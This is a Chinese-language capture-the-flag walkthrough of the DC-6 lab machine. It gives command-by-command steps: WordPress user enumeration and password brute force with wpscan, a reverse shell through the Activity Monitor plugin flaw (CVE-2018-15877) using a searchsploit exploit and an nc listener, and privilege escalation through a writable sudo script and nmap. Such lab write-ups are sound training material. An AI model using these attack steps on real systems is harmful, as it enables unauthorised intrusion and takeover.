靶机描述
下载地址:http://www.five86.com/downloads/DC-6.zip
1 | DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. |
信息收集
扫面同网段存活主机
1 | arp-scan -l |
扫描目标端口,发现开启了22端口和80端口,其中80端口是一个web服务应用
1 | nmap -A 172.18.1.140 |
尝试访问web应用,发现遇到了和DC-2靶机一样的问题,需要设置一下域名解析
需要在hosts文件中加一条ip和域名的指定
文件地址一般如下:
1 | C:\Windows\System32\drivers\etc |
然后就可以正常访问了,发现界面和DC-2的界面也一样
同样也是用wordpress搭建的一个网站
也可以使用whatweb这个工具看到更详细的内容
1 | WhatWeb是比较常用的工具之一,它可以识别包括内容管理系统 (CMS)、博客平台、统计/分析包、JavaScript库、网络服务器和嵌入式设备。 |
扫描后台路径
1 | dirsearch -u http://wordy/ |
找到后台登录地址
漏洞发现与利用
跟DC-2一样,使用wpscan获取一下网站用户,一共发现五个用户名
1 | wpscan --url http://wordy -e u |
将用户名保存成一个txt放到桌面
然后需要找到密码,靶机描述用一个提示,告诉我们了一个密码获取方法
1 | cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt |
有了账号和密码就可以对网站进行爆破了
1 | wpscan --url http://wordy/ -U user.txt -P passwords.txt |
成功发现一个账号密码
1 | mark/helpdesk01 |
登录后台
这个界面和DC-2有个明显不一样的地方,就是左侧多安装了一个插件
针对性的去搜索相关漏洞
1 | searchsploit activity monitor |
这两个exp都能使用,我们拷贝一份到桌面
1 | searchsploit -m 45274.html |
然后更改web网址和kali的ip
1 | localhost:8000 改为 wordy |
设置kali监听端口
1 | nc -lvvp 9999 |
然后浏览器访问html文件(这里需要注意,我们用本地打开的网站,所以也要在本地打开这个html,还需要保持登录状态)
点击按钮,就能监听到端口,如果弹出登录页面,就登录一下,然后重新打开html
python升级成交互shell
1 | python -c 'import pty; pty.spawn("/bin/bash")' |
提权
信息收集一些,看看有什么可以利用的
尝试suid提权,本没有找到有用的信息
1 | find / -user root -perm -4000 -print 2>/dev/null |
但是在home文件夹下发现多个用户信息
在jens和mark文件下有内容
查看jens下的bash文件,发现只是网址文件的解压命令,没有用处
查看mark下的stuff,发现一个新账户的账号密码
切换该用户
查看用户权限信息,发现该用户对刚才的bash脚本文件有jens权限
1 | sudo -l |
我们可以切换到jens目录下,利用该用户在backups.sh中尝试写入/bin/bash,直接免密码切换到 jens 用户
1 | echo "/bin/bash" >> backups.sh |
切换用户成功
继续查看用户权限信息,发现可以提权的工具nmap
nmap提权
1 | 利用 nmap 提权 |
提权成功
获取flag
1 | find / -name *flag* |
漏洞原理
WordPress 插件Plainview Activity Monitor被曝出存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。 远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
总结
- whatweb指纹识别工具
- wpscan漏洞扫描工具
- WordPress插件 "Activity Monitor"漏洞(CVE-2018-15877)
- nmap提权